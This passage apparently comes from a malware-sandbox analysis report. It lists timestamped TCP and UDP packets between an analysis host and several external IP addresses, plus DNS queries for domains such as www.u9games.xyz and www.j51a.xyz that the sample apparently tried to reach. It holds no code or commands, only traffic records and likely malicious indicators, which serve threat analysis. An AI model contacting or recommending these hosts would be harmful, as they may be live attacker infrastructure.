                                    Jul 11, 2024 15:06:54.555382967 CEST4973980192.168.2.635.212.86.52
                                    Jul 11, 2024 15:06:54.555397034 CEST4973980192.168.2.635.212.86.52
                                    Jul 11, 2024 15:06:54.559283972 CEST804973935.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:54.559294939 CEST804973935.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:54.559304953 CEST804973935.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:54.559345007 CEST4973980192.168.2.635.212.86.52
                                    Jul 11, 2024 15:06:54.649532080 CEST804973935.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:54.649559975 CEST804973935.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:54.649571896 CEST804973935.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:54.649583101 CEST804973935.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:54.649594069 CEST804973935.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:54.649610996 CEST804973935.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:54.649621964 CEST804973935.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:54.649631977 CEST804973935.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:54.649652004 CEST4973980192.168.2.635.212.86.52
                                    Jul 11, 2024 15:06:54.649759054 CEST4973980192.168.2.635.212.86.52
                                    Jul 11, 2024 15:06:54.652306080 CEST804973935.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:54.652318001 CEST804973935.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:54.652328968 CEST804973935.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:54.652338982 CEST804973935.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:54.652348995 CEST804973935.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:54.652355909 CEST4973980192.168.2.635.212.86.52
                                    Jul 11, 2024 15:06:54.652359962 CEST804973935.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:54.652369976 CEST804973935.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:54.652375937 CEST4973980192.168.2.635.212.86.52
                                    Jul 11, 2024 15:06:54.652380943 CEST804973935.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:54.652390957 CEST804973935.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:54.652400970 CEST804973935.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:54.652410030 CEST4973980192.168.2.635.212.86.52
                                    Jul 11, 2024 15:06:54.652412891 CEST804973935.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:54.652422905 CEST804973935.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:54.652427912 CEST4973980192.168.2.635.212.86.52
                                    Jul 11, 2024 15:06:54.652431965 CEST804973935.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:54.652442932 CEST804973935.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:54.652453899 CEST804973935.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:54.652463913 CEST804973935.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:54.652467012 CEST4973980192.168.2.635.212.86.52
                                    Jul 11, 2024 15:06:54.652506113 CEST4973980192.168.2.635.212.86.52
                                    Jul 11, 2024 15:06:54.652793884 CEST804973935.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:54.652805090 CEST804973935.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:54.652838945 CEST4973980192.168.2.635.212.86.52
                                    Jul 11, 2024 15:06:54.652906895 CEST804973935.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:54.652918100 CEST804973935.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:54.652929068 CEST804973935.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:54.652939081 CEST804973935.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:54.652949095 CEST804973935.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:54.652959108 CEST804973935.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:54.652961969 CEST4973980192.168.2.635.212.86.52
                                    Jul 11, 2024 15:06:54.652995110 CEST4973980192.168.2.635.212.86.52
                                    Jul 11, 2024 15:06:54.653125048 CEST804973935.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:54.653135061 CEST804973935.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:54.653147936 CEST804973935.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:54.653167009 CEST4973980192.168.2.635.212.86.52
                                    Jul 11, 2024 15:06:54.653194904 CEST4973980192.168.2.635.212.86.52
                                    Jul 11, 2024 15:06:54.671879053 CEST4973980192.168.2.635.212.86.52
                                    Jul 11, 2024 15:06:54.677062035 CEST804973935.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:59.733335018 CEST4974080192.168.2.6188.114.96.3
                                    Jul 11, 2024 15:06:59.740539074 CEST8049740188.114.96.3192.168.2.6
                                    Jul 11, 2024 15:06:59.741482019 CEST4974080192.168.2.6188.114.96.3
                                    Jul 11, 2024 15:06:59.761285067 CEST4974080192.168.2.6188.114.96.3
                                    Jul 11, 2024 15:06:59.766175032 CEST8049740188.114.96.3192.168.2.6
                                    Jul 11, 2024 15:07:00.483117104 CEST8049740188.114.96.3192.168.2.6
                                    Jul 11, 2024 15:07:00.483494997 CEST8049740188.114.96.3192.168.2.6
                                    Jul 11, 2024 15:07:00.483608961 CEST4974080192.168.2.6188.114.96.3
                                    Jul 11, 2024 15:07:01.279733896 CEST4974080192.168.2.6188.114.96.3
                                    Jul 11, 2024 15:07:02.320624113 CEST4974180192.168.2.6188.114.96.3
                                    Jul 11, 2024 15:07:02.326004982 CEST8049741188.114.96.3192.168.2.6
                                    Jul 11, 2024 15:07:02.326076984 CEST4974180192.168.2.6188.114.96.3
                                    Jul 11, 2024 15:07:02.361686945 CEST4974180192.168.2.6188.114.96.3
                                    Jul 11, 2024 15:07:02.366760969 CEST8049741188.114.96.3192.168.2.6
                                    Jul 11, 2024 15:07:03.878617048 CEST4974180192.168.2.6188.114.96.3
                                    Jul 11, 2024 15:07:03.884021044 CEST8049741188.114.96.3192.168.2.6
                                    Jul 11, 2024 15:07:03.884099960 CEST4974180192.168.2.6188.114.96.3
                                    Jul 11, 2024 15:07:04.904922962 CEST4974280192.168.2.6188.114.96.3
                                    Jul 11, 2024 15:07:05.370608091 CEST8049742188.114.96.3192.168.2.6
                                    Jul 11, 2024 15:07:05.370728016 CEST4974280192.168.2.6188.114.96.3
                                    Jul 11, 2024 15:07:05.394306898 CEST4974280192.168.2.6188.114.96.3
                                    Jul 11, 2024 15:07:05.399159908 CEST8049742188.114.96.3192.168.2.6
                                    Jul 11, 2024 15:07:05.399328947 CEST8049742188.114.96.3192.168.2.6
                                    Jul 11, 2024 15:07:06.076211929 CEST8049742188.114.96.3192.168.2.6
                                    Jul 11, 2024 15:07:06.077119112 CEST8049742188.114.96.3192.168.2.6
                                    Jul 11, 2024 15:07:06.077188969 CEST4974280192.168.2.6188.114.96.3
                                    Jul 11, 2024 15:07:06.905282021 CEST4974280192.168.2.6188.114.96.3
                                    Jul 11, 2024 15:07:07.950149059 CEST4974380192.168.2.6188.114.96.3
                                    Jul 11, 2024 15:07:07.955231905 CEST8049743188.114.96.3192.168.2.6
                                    Jul 11, 2024 15:07:07.955354929 CEST4974380192.168.2.6188.114.96.3
                                    Jul 11, 2024 15:07:07.976079941 CEST4974380192.168.2.6188.114.96.3
                                    Jul 11, 2024 15:07:07.981080055 CEST8049743188.114.96.3192.168.2.6
                                    Jul 11, 2024 15:07:09.809554100 CEST8049743188.114.96.3192.168.2.6
                                    Jul 11, 2024 15:07:09.810148001 CEST8049743188.114.96.3192.168.2.6
                                    Jul 11, 2024 15:07:09.812695980 CEST4974380192.168.2.6188.114.96.3
                                    Jul 11, 2024 15:07:09.819363117 CEST4974380192.168.2.6188.114.96.3
                                    Jul 11, 2024 15:07:09.824191093 CEST8049743188.114.96.3192.168.2.6
                                    Jul 11, 2024 15:07:14.885431051 CEST4974580192.168.2.6188.114.97.3
                                    Jul 11, 2024 15:07:14.890407085 CEST8049745188.114.97.3192.168.2.6
                                    Jul 11, 2024 15:07:14.890511990 CEST4974580192.168.2.6188.114.97.3
                                    Jul 11, 2024 15:07:14.913315058 CEST4974580192.168.2.6188.114.97.3
                                    Jul 11, 2024 15:07:14.918365955 CEST8049745188.114.97.3192.168.2.6
                                    Jul 11, 2024 15:07:15.810538054 CEST8049745188.114.97.3192.168.2.6
                                    Jul 11, 2024 15:07:15.811005116 CEST8049745188.114.97.3192.168.2.6
                                    Jul 11, 2024 15:07:15.813685894 CEST4974580192.168.2.6188.114.97.3
                                    Jul 11, 2024 15:07:16.426281929 CEST4974580192.168.2.6188.114.97.3
                                    Jul 11, 2024 15:07:17.455549002 CEST4974680192.168.2.6188.114.97.3
                                    Jul 11, 2024 15:07:17.460536957 CEST8049746188.114.97.3192.168.2.6
                                    Jul 11, 2024 15:07:17.460762024 CEST4974680192.168.2.6188.114.97.3
                                    Jul 11, 2024 15:07:17.488663912 CEST4974680192.168.2.6188.114.97.3
                                    Jul 11, 2024 15:07:17.511428118 CEST8049746188.114.97.3192.168.2.6
                                    Jul 11, 2024 15:07:18.354121923 CEST8049746188.114.97.3192.168.2.6
                                    Jul 11, 2024 15:07:18.354137897 CEST8049746188.114.97.3192.168.2.6
                                    Jul 11, 2024 15:07:18.354207993 CEST4974680192.168.2.6188.114.97.3
                                    Jul 11, 2024 15:07:18.997293949 CEST4974680192.168.2.6188.114.97.3
                                    Jul 11, 2024 15:07:20.033233881 CEST4974780192.168.2.6188.114.97.3
                                    Jul 11, 2024 15:07:20.038885117 CEST8049747188.114.97.3192.168.2.6
                                    Jul 11, 2024 15:07:20.038963079 CEST4974780192.168.2.6188.114.97.3
                                    Jul 11, 2024 15:07:20.067791939 CEST4974780192.168.2.6188.114.97.3
                                    Jul 11, 2024 15:07:20.073313951 CEST8049747188.114.97.3192.168.2.6
                                    Jul 11, 2024 15:07:20.073326111 CEST8049747188.114.97.3192.168.2.6
                                    Jul 11, 2024 15:07:20.942728996 CEST8049747188.114.97.3192.168.2.6
                                    Jul 11, 2024 15:07:20.943025112 CEST8049747188.114.97.3192.168.2.6
                                    Jul 11, 2024 15:07:20.943793058 CEST8049747188.114.97.3192.168.2.6
                                    Jul 11, 2024 15:07:20.943866968 CEST4974780192.168.2.6188.114.97.3
                                    Jul 11, 2024 15:07:21.575229883 CEST4974780192.168.2.6188.114.97.3
                                    Jul 11, 2024 15:07:22.627312899 CEST4974880192.168.2.6188.114.97.3
                                    Jul 11, 2024 15:07:22.633902073 CEST8049748188.114.97.3192.168.2.6
                                    Jul 11, 2024 15:07:22.634001017 CEST4974880192.168.2.6188.114.97.3
                                    Jul 11, 2024 15:07:22.659610987 CEST4974880192.168.2.6188.114.97.3
                                    Jul 11, 2024 15:07:22.664509058 CEST8049748188.114.97.3192.168.2.6
                                    Jul 11, 2024 15:07:23.577620029 CEST8049748188.114.97.3192.168.2.6
                                    Jul 11, 2024 15:07:23.581715107 CEST8049748188.114.97.3192.168.2.6
                                    Jul 11, 2024 15:07:23.583642006 CEST4974880192.168.2.6188.114.97.3
                                    Jul 11, 2024 15:07:23.589768887 CEST4974880192.168.2.6188.114.97.3
                                    Jul 11, 2024 15:07:23.633245945 CEST8049748188.114.97.3192.168.2.6
                                    Jul 11, 2024 15:07:23.633342028 CEST4974880192.168.2.6188.114.97.3
                                    Jul 11, 2024 15:07:23.638089895 CEST8049748188.114.97.3192.168.2.6
                                    Jul 11, 2024 15:07:30.898000956 CEST4974980192.168.2.6154.222.238.52
                                    Jul 11, 2024 15:07:30.904681921 CEST8049749154.222.238.52192.168.2.6
                                    Jul 11, 2024 15:07:30.905432940 CEST4974980192.168.2.6154.222.238.52
                                    Jul 11, 2024 15:07:30.927772999 CEST4974980192.168.2.6154.222.238.52
                                    Jul 11, 2024 15:07:30.933275938 CEST8049749154.222.238.52192.168.2.6
                                    Jul 11, 2024 15:07:31.710470915 CEST8049749154.222.238.52192.168.2.6
                                    Jul 11, 2024 15:07:31.760680914 CEST4974980192.168.2.6154.222.238.52
                                    Jul 11, 2024 15:07:31.763227940 CEST8049749154.222.238.52192.168.2.6
                                    Jul 11, 2024 15:07:31.763406038 CEST4974980192.168.2.6154.222.238.52
                                    Jul 11, 2024 15:07:32.434736013 CEST4974980192.168.2.6154.222.238.52
                                    Jul 11, 2024 15:07:33.473323107 CEST4975080192.168.2.6154.222.238.52
                                    Jul 11, 2024 15:07:33.478374958 CEST8049750154.222.238.52192.168.2.6
                                    Jul 11, 2024 15:07:33.481425047 CEST4975080192.168.2.6154.222.238.52
                                    Jul 11, 2024 15:07:33.501312971 CEST4975080192.168.2.6154.222.238.52
                                    Jul 11, 2024 15:07:33.506899118 CEST8049750154.222.238.52192.168.2.6
                                    Jul 11, 2024 15:07:34.281130075 CEST8049750154.222.238.52192.168.2.6
                                    Jul 11, 2024 15:07:34.323153973 CEST4975080192.168.2.6154.222.238.52
                                    Jul 11, 2024 15:07:34.331671953 CEST8049750154.222.238.52192.168.2.6
                                    Jul 11, 2024 15:07:34.331716061 CEST4975080192.168.2.6154.222.238.52
                                    Jul 11, 2024 15:07:35.013322115 CEST4975080192.168.2.6154.222.238.52
                                    Jul 11, 2024 15:07:36.252640009 CEST4975180192.168.2.6154.222.238.52
                                    Jul 11, 2024 15:07:36.261349916 CEST8049751154.222.238.52192.168.2.6
                                    Jul 11, 2024 15:07:36.261449099 CEST4975180192.168.2.6154.222.238.52
                                    Jul 11, 2024 15:07:36.295028925 CEST4975180192.168.2.6154.222.238.52
                                    Jul 11, 2024 15:07:36.301656008 CEST8049751154.222.238.52192.168.2.6
                                    Jul 11, 2024 15:07:36.301687956 CEST8049751154.222.238.52192.168.2.6
                                    Jul 11, 2024 15:07:37.095194101 CEST8049751154.222.238.52192.168.2.6
                                    Jul 11, 2024 15:07:37.145203114 CEST8049751154.222.238.52192.168.2.6
                                    Jul 11, 2024 15:07:37.145411015 CEST4975180192.168.2.6154.222.238.52
                                    Jul 11, 2024 15:07:37.809335947 CEST4975180192.168.2.6154.222.238.52
                                    Jul 11, 2024 15:07:38.846180916 CEST4975280192.168.2.6154.222.238.52
                                    Jul 11, 2024 15:07:38.851262093 CEST8049752154.222.238.52192.168.2.6
                                    Jul 11, 2024 15:07:38.851345062 CEST4975280192.168.2.6154.222.238.52
                                    Jul 11, 2024 15:07:38.871550083 CEST4975280192.168.2.6154.222.238.52
                                    Jul 11, 2024 15:07:38.876611948 CEST8049752154.222.238.52192.168.2.6
                                    Jul 11, 2024 15:07:39.656439066 CEST8049752154.222.238.52192.168.2.6
                                    Jul 11, 2024 15:07:39.704636097 CEST8049752154.222.238.52192.168.2.6
                                    Jul 11, 2024 15:07:39.705599070 CEST4975280192.168.2.6154.222.238.52
                                    Jul 11, 2024 15:07:39.709604025 CEST4975280192.168.2.6154.222.238.52
                                    Jul 11, 2024 15:07:39.714782953 CEST8049752154.222.238.52192.168.2.6
                                    Jul 11, 2024 15:07:45.090471029 CEST4975380192.168.2.6162.254.38.56
                                    Jul 11, 2024 15:07:45.095383883 CEST8049753162.254.38.56192.168.2.6
                                    Jul 11, 2024 15:07:45.101345062 CEST4975380192.168.2.6162.254.38.56
                                    Jul 11, 2024 15:07:45.121443987 CEST4975380192.168.2.6162.254.38.56
                                    Jul 11, 2024 15:07:45.127480984 CEST8049753162.254.38.56192.168.2.6
                                    Jul 11, 2024 15:07:45.734488964 CEST8049753162.254.38.56192.168.2.6
                                    Jul 11, 2024 15:07:45.734533072 CEST8049753162.254.38.56192.168.2.6
                                    Jul 11, 2024 15:07:45.734566927 CEST8049753162.254.38.56192.168.2.6
                                    Jul 11, 2024 15:07:45.734601974 CEST4975380192.168.2.6162.254.38.56
                                    Jul 11, 2024 15:07:45.734708071 CEST8049753162.254.38.56192.168.2.6
                                    Jul 11, 2024 15:07:45.734741926 CEST8049753162.254.38.56192.168.2.6
                                    Jul 11, 2024 15:07:45.734776020 CEST8049753162.254.38.56192.168.2.6
                                    Jul 11, 2024 15:07:45.734810114 CEST8049753162.254.38.56192.168.2.6
                                    Jul 11, 2024 15:07:45.734854937 CEST4975380192.168.2.6162.254.38.56
                                    Jul 11, 2024 15:07:45.734882116 CEST8049753162.254.38.56192.168.2.6
                                    Jul 11, 2024 15:07:45.734915972 CEST8049753162.254.38.56192.168.2.6
                                    Jul 11, 2024 15:07:45.734951019 CEST8049753162.254.38.56192.168.2.6
                                    Jul 11, 2024 15:07:45.735038042 CEST4975380192.168.2.6162.254.38.56
                                    Jul 11, 2024 15:07:45.735357046 CEST4975380192.168.2.6162.254.38.56
                                    Jul 11, 2024 15:07:45.739643097 CEST8049753162.254.38.56192.168.2.6
                                    Jul 11, 2024 15:07:45.739748955 CEST8049753162.254.38.56192.168.2.6
                                    Jul 11, 2024 15:07:45.739861012 CEST4975380192.168.2.6162.254.38.56
                                    Jul 11, 2024 15:07:45.831650972 CEST8049753162.254.38.56192.168.2.6
                                    Jul 11, 2024 15:07:45.831715107 CEST8049753162.254.38.56192.168.2.6
                                    Jul 11, 2024 15:07:45.831784010 CEST4975380192.168.2.6162.254.38.56
                                    Jul 11, 2024 15:07:45.833199978 CEST8049753162.254.38.56192.168.2.6
                                    Jul 11, 2024 15:07:45.833636999 CEST4975380192.168.2.6162.254.38.56
                                    Jul 11, 2024 15:07:46.623470068 CEST4975380192.168.2.6162.254.38.56
                                    Jul 11, 2024 15:07:47.657917976 CEST4975480192.168.2.6162.254.38.56
                                    Jul 11, 2024 15:07:47.662992954 CEST8049754162.254.38.56192.168.2.6
                                    Jul 11, 2024 15:07:47.664155960 CEST4975480192.168.2.6162.254.38.56
                                    Jul 11, 2024 15:07:47.687247992 CEST4975480192.168.2.6162.254.38.56
                                    Jul 11, 2024 15:07:47.692276001 CEST8049754162.254.38.56192.168.2.6
                                    Jul 11, 2024 15:07:48.272490025 CEST8049754162.254.38.56192.168.2.6
                                    Jul 11, 2024 15:07:48.272509098 CEST8049754162.254.38.56192.168.2.6
                                    Jul 11, 2024 15:07:48.272603035 CEST4975480192.168.2.6162.254.38.56
                                    Jul 11, 2024 15:07:48.272612095 CEST8049754162.254.38.56192.168.2.6
                                    Jul 11, 2024 15:07:48.272625923 CEST8049754162.254.38.56192.168.2.6
                                    Jul 11, 2024 15:07:48.272638083 CEST8049754162.254.38.56192.168.2.6
                                    Jul 11, 2024 15:07:48.272650003 CEST8049754162.254.38.56192.168.2.6
                                    Jul 11, 2024 15:07:48.272663116 CEST8049754162.254.38.56192.168.2.6
                                    Jul 11, 2024 15:07:48.272674084 CEST8049754162.254.38.56192.168.2.6
                                    Jul 11, 2024 15:07:48.272777081 CEST4975480192.168.2.6162.254.38.56
                                    Jul 11, 2024 15:07:48.272777081 CEST4975480192.168.2.6162.254.38.56
                                    Jul 11, 2024 15:07:48.272777081 CEST4975480192.168.2.6162.254.38.56
                                    Jul 11, 2024 15:07:48.272932053 CEST8049754162.254.38.56192.168.2.6
                                    Jul 11, 2024 15:07:48.272943974 CEST8049754162.254.38.56192.168.2.6
                                    Jul 11, 2024 15:07:48.273156881 CEST4975480192.168.2.6162.254.38.56
                                    Jul 11, 2024 15:07:48.277702093 CEST8049754162.254.38.56192.168.2.6
                                    Jul 11, 2024 15:07:48.277729988 CEST8049754162.254.38.56192.168.2.6
                                    Jul 11, 2024 15:07:48.277743101 CEST8049754162.254.38.56192.168.2.6
                                    Jul 11, 2024 15:07:48.277776957 CEST4975480192.168.2.6162.254.38.56
                                    Jul 11, 2024 15:07:48.323226929 CEST4975480192.168.2.6162.254.38.56
                                    Jul 11, 2024 15:07:48.360429049 CEST8049754162.254.38.56192.168.2.6
                                    Jul 11, 2024 15:07:48.360580921 CEST8049754162.254.38.56192.168.2.6
                                    Jul 11, 2024 15:07:48.360594988 CEST8049754162.254.38.56192.168.2.6
                                    Jul 11, 2024 15:07:48.360707998 CEST4975480192.168.2.6162.254.38.56
                                    Jul 11, 2024 15:07:48.360707998 CEST4975480192.168.2.6162.254.38.56
                                    Jul 11, 2024 15:07:49.203634024 CEST4975480192.168.2.6162.254.38.56
                                    Jul 11, 2024 15:07:50.241648912 CEST4975580192.168.2.6162.254.38.56
                                    Jul 11, 2024 15:07:50.246762037 CEST8049755162.254.38.56192.168.2.6
                                    Jul 11, 2024 15:07:50.246825933 CEST4975580192.168.2.6162.254.38.56
                                    Jul 11, 2024 15:07:50.276890039 CEST4975580192.168.2.6162.254.38.56
                                    Jul 11, 2024 15:07:50.283454895 CEST8049755162.254.38.56192.168.2.6
                                    Jul 11, 2024 15:07:50.283467054 CEST8049755162.254.38.56192.168.2.6
                                    Jul 11, 2024 15:07:50.859935045 CEST8049755162.254.38.56192.168.2.6
                                    Jul 11, 2024 15:07:50.859982967 CEST8049755162.254.38.56192.168.2.6
                                    Jul 11, 2024 15:07:50.859993935 CEST8049755162.254.38.56192.168.2.6
                                    Jul 11, 2024 15:07:50.860023022 CEST4975580192.168.2.6162.254.38.56
                                    Jul 11, 2024 15:07:50.860222101 CEST8049755162.254.38.56192.168.2.6
                                    Jul 11, 2024 15:07:50.860233068 CEST8049755162.254.38.56192.168.2.6
                                    Jul 11, 2024 15:07:50.860243082 CEST8049755162.254.38.56192.168.2.6
                                    Jul 11, 2024 15:07:50.860255003 CEST8049755162.254.38.56192.168.2.6
                                    Jul 11, 2024 15:07:50.860272884 CEST4975580192.168.2.6162.254.38.56
                                    Jul 11, 2024 15:07:50.860305071 CEST4975580192.168.2.6162.254.38.56
                                    Jul 11, 2024 15:07:50.860724926 CEST8049755162.254.38.56192.168.2.6
                                    Jul 11, 2024 15:07:50.860737085 CEST8049755162.254.38.56192.168.2.6
                                    Jul 11, 2024 15:07:50.860749006 CEST8049755162.254.38.56192.168.2.6
                                    Jul 11, 2024 15:07:50.860773087 CEST4975580192.168.2.6162.254.38.56
                                    Jul 11, 2024 15:07:50.860805035 CEST4975580192.168.2.6162.254.38.56
                                    Jul 11, 2024 15:07:50.865112066 CEST8049755162.254.38.56192.168.2.6
                                    Jul 11, 2024 15:07:50.865557909 CEST8049755162.254.38.56192.168.2.6
                                    Jul 11, 2024 15:07:50.865628004 CEST4975580192.168.2.6162.254.38.56
                                    Jul 11, 2024 15:07:50.954102993 CEST8049755162.254.38.56192.168.2.6
                                    Jul 11, 2024 15:07:50.954139948 CEST8049755162.254.38.56192.168.2.6
                                    Jul 11, 2024 15:07:50.954152107 CEST8049755162.254.38.56192.168.2.6
                                    Jul 11, 2024 15:07:50.954283953 CEST4975580192.168.2.6162.254.38.56
                                    Jul 11, 2024 15:07:51.794049978 CEST4975580192.168.2.6162.254.38.56
                                    Jul 11, 2024 15:07:52.829062939 CEST4975680192.168.2.6162.254.38.56
                                    Jul 11, 2024 15:07:52.834033966 CEST8049756162.254.38.56192.168.2.6
                                    Jul 11, 2024 15:07:52.834167004 CEST4975680192.168.2.6162.254.38.56
                                    Jul 11, 2024 15:07:52.855523109 CEST4975680192.168.2.6162.254.38.56
                                    Jul 11, 2024 15:07:52.860551119 CEST8049756162.254.38.56192.168.2.6
                                    Jul 11, 2024 15:07:53.434295893 CEST8049756162.254.38.56192.168.2.6
                                    Jul 11, 2024 15:07:53.434313059 CEST8049756162.254.38.56192.168.2.6
                                    Jul 11, 2024 15:07:53.434324980 CEST8049756162.254.38.56192.168.2.6
                                    Jul 11, 2024 15:07:53.434334993 CEST8049756162.254.38.56192.168.2.6
                                    Jul 11, 2024 15:07:53.434448957 CEST4975680192.168.2.6162.254.38.56
                                    Jul 11, 2024 15:07:53.434474945 CEST8049756162.254.38.56192.168.2.6
                                    Jul 11, 2024 15:07:53.434484959 CEST8049756162.254.38.56192.168.2.6
                                    Jul 11, 2024 15:07:53.434520006 CEST4975680192.168.2.6162.254.38.56
                                    Jul 11, 2024 15:07:53.434578896 CEST4975680192.168.2.6162.254.38.56
                                    Jul 11, 2024 15:07:53.434590101 CEST8049756162.254.38.56192.168.2.6
                                    Jul 11, 2024 15:07:53.434600115 CEST8049756162.254.38.56192.168.2.6
                                    Jul 11, 2024 15:07:53.434611082 CEST8049756162.254.38.56192.168.2.6
                                    Jul 11, 2024 15:07:53.434669018 CEST4975680192.168.2.6162.254.38.56
                                    Jul 11, 2024 15:07:53.434748888 CEST8049756162.254.38.56192.168.2.6
                                    Jul 11, 2024 15:07:53.435050011 CEST4975680192.168.2.6162.254.38.56
                                    Jul 11, 2024 15:07:53.439491987 CEST8049756162.254.38.56192.168.2.6
                                    Jul 11, 2024 15:07:53.439630032 CEST8049756162.254.38.56192.168.2.6
                                    Jul 11, 2024 15:07:53.439640045 CEST8049756162.254.38.56192.168.2.6
                                    Jul 11, 2024 15:07:53.439675093 CEST4975680192.168.2.6162.254.38.56
                                    Jul 11, 2024 15:07:53.479417086 CEST4975680192.168.2.6162.254.38.56
                                    Jul 11, 2024 15:07:53.521435976 CEST8049756162.254.38.56192.168.2.6
                                    Jul 11, 2024 15:07:53.521608114 CEST8049756162.254.38.56192.168.2.6
                                    Jul 11, 2024 15:07:53.521761894 CEST4975680192.168.2.6162.254.38.56
                                    Jul 11, 2024 15:07:53.522242069 CEST8049756162.254.38.56192.168.2.6
                                    Jul 11, 2024 15:07:53.525480986 CEST4975680192.168.2.6162.254.38.56
                                    Jul 11, 2024 15:07:53.531378031 CEST4975680192.168.2.6162.254.38.56
                                    Jul 11, 2024 15:07:53.536086082 CEST8049756162.254.38.56192.168.2.6

                                    UDP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Jul 11, 2024 15:05:38.886055946 CEST5554953192.168.2.61.1.1.1
                                    Jul 11, 2024 15:05:38.903593063 CEST53555491.1.1.1192.168.2.6
                                    Jul 11, 2024 15:06:00.139414072 CEST6263653192.168.2.61.1.1.1
                                    Jul 11, 2024 15:06:00.456995964 CEST53626361.1.1.1192.168.2.6
                                    Jul 11, 2024 15:06:16.376205921 CEST5424653192.168.2.61.1.1.1
                                    Jul 11, 2024 15:06:16.700287104 CEST53542461.1.1.1192.168.2.6
                                    Jul 11, 2024 15:06:30.095431089 CEST5545553192.168.2.61.1.1.1
                                    Jul 11, 2024 15:06:31.088874102 CEST5545553192.168.2.61.1.1.1
                                    Jul 11, 2024 15:06:32.104456902 CEST5545553192.168.2.61.1.1.1
                                    Jul 11, 2024 15:06:32.594490051 CEST53554551.1.1.1192.168.2.6
                                    Jul 11, 2024 15:06:32.594628096 CEST53554551.1.1.1192.168.2.6
                                    Jul 11, 2024 15:06:32.594638109 CEST53554551.1.1.1192.168.2.6
                                    Jul 11, 2024 15:06:46.152391911 CEST6146553192.168.2.61.1.1.1
                                    Jul 11, 2024 15:06:46.226650000 CEST53614651.1.1.1192.168.2.6
                                    Jul 11, 2024 15:06:59.705275059 CEST6371753192.168.2.61.1.1.1
                                    Jul 11, 2024 15:06:59.723392963 CEST53637171.1.1.1192.168.2.6
                                    Jul 11, 2024 15:07:14.856864929 CEST5379153192.168.2.61.1.1.1
                                    Jul 11, 2024 15:07:14.873545885 CEST53537911.1.1.1192.168.2.6
                                    Jul 11, 2024 15:07:28.635606050 CEST4991853192.168.2.61.1.1.1
                                    Jul 11, 2024 15:07:29.652071953 CEST4991853192.168.2.61.1.1.1
                                    Jul 11, 2024 15:07:30.652074099 CEST4991853192.168.2.61.1.1.1
                                    Jul 11, 2024 15:07:30.881448030 CEST53499181.1.1.1192.168.2.6
                                    Jul 11, 2024 15:07:30.881674051 CEST53499181.1.1.1192.168.2.6
                                    Jul 11, 2024 15:07:30.881932974 CEST53499181.1.1.1192.168.2.6
                                    Jul 11, 2024 15:07:44.743383884 CEST5916253192.168.2.61.1.1.1
                                    Jul 11, 2024 15:07:45.077600956 CEST53591621.1.1.1192.168.2.6

                                    DNS Queries

                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                    Jul 11, 2024 15:05:38.886055946 CEST192.168.2.61.1.1.10xe1feStandard query (0)www.u9games.xyzA (IP address)IN (0x0001)false
                                    Jul 11, 2024 15:06:00.139414072 CEST192.168.2.61.1.1.10x4bc5Standard query (0)www.dtalusering.comA (IP address)IN (0x0001)false
                                    Jul 11, 2024 15:06:16.376205921 CEST192.168.2.61.1.1.10x19eeStandard query (0)www.alphacentura.comA (IP address)IN (0x0001)false
                                    Jul 11, 2024 15:06:30.095431089 CEST192.168.2.61.1.1.10x1da1Standard query (0)www.xn72dkd7scx.shopA (IP address)IN (0x0001)false
                                    Jul 11, 2024 15:06:31.088874102 CEST192.168.2.61.1.1.10x1da1Standard query (0)www.xn72dkd7scx.shopA (IP address)IN (0x0001)false
                                    Jul 11, 2024 15:06:32.104456902 CEST192.168.2.61.1.1.10x1da1Standard query (0)www.xn72dkd7scx.shopA (IP address)IN (0x0001)false
                                    Jul 11, 2024 15:06:46.152391911 CEST192.168.2.61.1.1.10x770dStandard query (0)www.dynamologistics.netA (IP address)IN (0x0001)false
                                    Jul 11, 2024 15:06:59.705275059 CEST192.168.2.61.1.1.10x6e4fStandard query (0)www.globaltrend.xyzA (IP address)IN (0x0001)false
                                    Jul 11, 2024 15:07:14.856864929 CEST192.168.2.61.1.1.10xa228Standard query (0)www.ffi07s.xyzA (IP address)IN (0x0001)false
                                    Jul 11, 2024 15:07:28.635606050 CEST192.168.2.61.1.1.10xc2a6Standard query (0)www.j51a.xyzA (IP address)IN (0x0001)false
                                    Jul 11, 2024 15:07:29.652071953 CEST192.168.2.61.1.1.10xc2a6Standard query (0)www.j51a.xyzA (IP address)IN (0x0001)false
